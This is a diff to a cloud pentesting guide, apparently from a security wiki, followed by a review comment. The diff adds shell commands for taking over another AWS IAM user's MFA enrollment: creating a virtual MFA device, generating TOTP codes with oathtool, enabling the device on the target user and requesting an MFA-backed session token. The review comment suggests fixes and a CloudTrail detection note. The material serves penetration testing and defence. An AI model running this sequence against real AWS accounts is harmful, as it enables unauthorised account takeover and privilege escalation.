diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md index 440ff931e..a35a26db9 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md @@ -57,17 +57,40 @@ aws iam delete-access-key --access-key-id If you can create a new virtual MFA device and enable it on another user, you can effectively enroll your own MFA for that user and then request an MFA-backed session for their credentials. +**Prerequisites:** + +You can use any tool you want for the TOTP codes - oathtool is easy and lightweight. + +```bash +sudo apt install oathtool +sudo dnf install oathtool +sudo yum install oathtool +``` + **Exploit:** ```bash # Create a virtual MFA device (this returns the serial and the base32 seed) -aws iam create-virtual-mfa-device --virtual-mfa-device-name +aws iam create-virtual-mfa-device --virtual-mfa-device-name \ + --bootstrap-method Base32StringSeed --outfile /path/to/save/mfa-seed.txt -# Generate 2 consecutive TOTP codes from the seed, then enable it for the user -aws iam enable-mfa-device --user-name --serial-number \ +# Generate 2 consecutive TOTP codes from the seed + +oathtool --base32 --totp "" -w 1 + +# Enable the new device for the user +aws iam enable-mfa-device --user-name --serial-number \ --authentication-code1 --authentication-code2 ``` +**Authenticate:** + +Once you have a basic session as the target user, you can use the security token service to get an MFA-backed token. + +```bash +aws sts get-session-token --serial-number --token-code +``` + **Impact:** Direct privilege escalation by taking over a user's MFA enrollment (and then using their permissions). ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
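Review bot: the **Prerequisites** block presents `sudo apt install oathtool`, `sudo dnf install oathtool` and `sudo yum install oathtool` as one runnable script, but they are alternatives for different distributions, and pasting the block verbatim fails at the second line on every one of them; mark them as alternatives, either one fenced block per distribution or a comment such as `# Debian/Ubuntu`, `# Fedora`, `# RHEL/CentOS` above each line. The rest of the hunk is a real fix: `--outfile` is a required parameter of `aws iam create-virtual-mfa-device`, so the old one-liner could not have run as written, and `--bootstrap-method Base32StringSeed` is what makes the saved file usable directly as the TOTP seed. Two documentation points remain: the comment above `oathtool --base32 --totp "" -w 1` should say that `-w 1` prints the current code plus the next one, and that `enable-mfa-device` must be called with both before the first expires (roughly 30 seconds), since a stale pair is the usual reason that call fails. Finally, since the section now spells out the full sequence, the **Impact** paragraph would benefit from a one-line detection note: both `CreateVirtualMFADevice` and `EnableMFADevice` are IAM API calls recorded in CloudTrail, and an `EnableMFADevice` event whose calling identity differs from the `userName` in the request parameters is a strong signal of exactly this takeover.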